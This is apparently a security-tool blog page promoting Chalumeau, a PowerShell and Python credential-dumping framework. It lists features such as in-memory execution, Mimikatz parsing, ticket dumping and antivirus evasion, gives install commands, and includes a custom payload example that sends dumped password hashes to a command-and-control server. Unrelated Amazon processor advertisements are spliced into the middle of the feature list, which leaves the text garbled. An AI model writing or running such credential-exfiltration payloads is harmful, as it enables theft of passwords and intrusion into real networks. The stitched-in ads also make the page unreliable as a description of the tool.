Chalumeau – Automated, Extendable And Customizable Credential Dumping Tool

Chalumeau is automated,extendable and customizable credential dumping tool based on powershell and python.
Main Features
The world's most advanced processor in the desktop PC gaming segment Can deliver ultra-fast 100+ FPS performance in the world's most popular games 6 cores and 12 processing threads bundled with the quiet AMD wraith stealth cooler max temps 95°C 4 2 G... read more
(as of January 19, 2021 - More infoProduct prices and availability are accurate as of the date/time indicated and are subject to change. Any price and availability information displayed on [relevant Amazon Site(s), as applicable] at the time of purchase will apply to the purchase of this product.)
The world's most advanced processor in the desktop PC gaming segment Can deliver ultra-fast 100+ FPS performance in the world's most popular games 8 cores and 16 processing threads, bundled with the AMD Wraith Prism cooler with color controlled LED s... read more
(as of January 19, 2021 - More infoProduct prices and availability are accurate as of the date/time indicated and are subject to change. Any price and availability information displayed on [relevant Amazon Site(s), as applicable] at the time of purchase will apply to the purchase of this product.)
The world's most advanced processor in the desktop PC gaming segment Can deliver ultra-fast 100+ FPS performance in the world's most popular games 12 cores and 24 processing threads, bundled with the AMD Wraith Prism cooler with color controlled LED ... read more
(as of January 19, 2021 - More infoProduct prices and availability are accurate as of the date/time indicated and are subject to change. Any price and availability information displayed on [relevant Amazon Site(s), as applicable] at the time of purchase will apply to the purchase of this product.)
- Write your own Payloads
- In-Memory execution
- Extract Password List
- Dashboard reporting / Web Interface
- Parsing Mimikatz
- Dumping Tickets
Screenshots

Known Issues
- Parsing Mimikatz dcsync (working on fix)
- Bypassing Antivirus and EDRs , you will need to maintain your payloads
TODO
- Encrypted Communication
- Automated Lateral movement
- Automated Password Spraying
- Automated Hash Cracking
Using
git clone https://github.com/cyberstruggle/chalumeau.git
cd chalumeau/
chmod +x install.sh
sudo ./install.sh
# Run
chmod +x start.sh
sudo ./start.sh
Write your own payload
obfuscate your own powershell payload for dumping credentials and use chalumeau function call without any imports chalumeau will Encrypt and contact with the c2 and sending the dumped credentials. just save the file under chalumeau-power/payloads
- Using ChalumeauSendCredentials Function
- ChalumeauSendCredentials
- Secret = the dumped hash or clear text password (string)
- Username = the username of id of the dumped credential (string)
- IsClearText = 1 if it’s clear text 0 if it’s not (int)
- Source = mention the Source payload like “Mimikatz Hash” (string)
- ChalumeauSendCredentials
# Custom Payload Example
# $DumpedHashes is array of dumped hashes from the local machine
foreach ($hash in $DumpedHashes){
ChalumeauSendCredentials -Secret $hash.secret -Username $hash.user -IsClearText 0 -source "My custom payload"
}
Credits
You may be interested in...
- wazehell Author
- Invoke-Obfuscation Daniel Bohannon
- Invoke-Mimikatz PowerSploit
- Get-PassHashes nishang
- Chalumeau Logo Aureliano
- Invoke-MassMimikatz PowerTools
Download Chalumeau
If you like the site, please consider joining the telegram channel or supporting us on Patreon using the button below.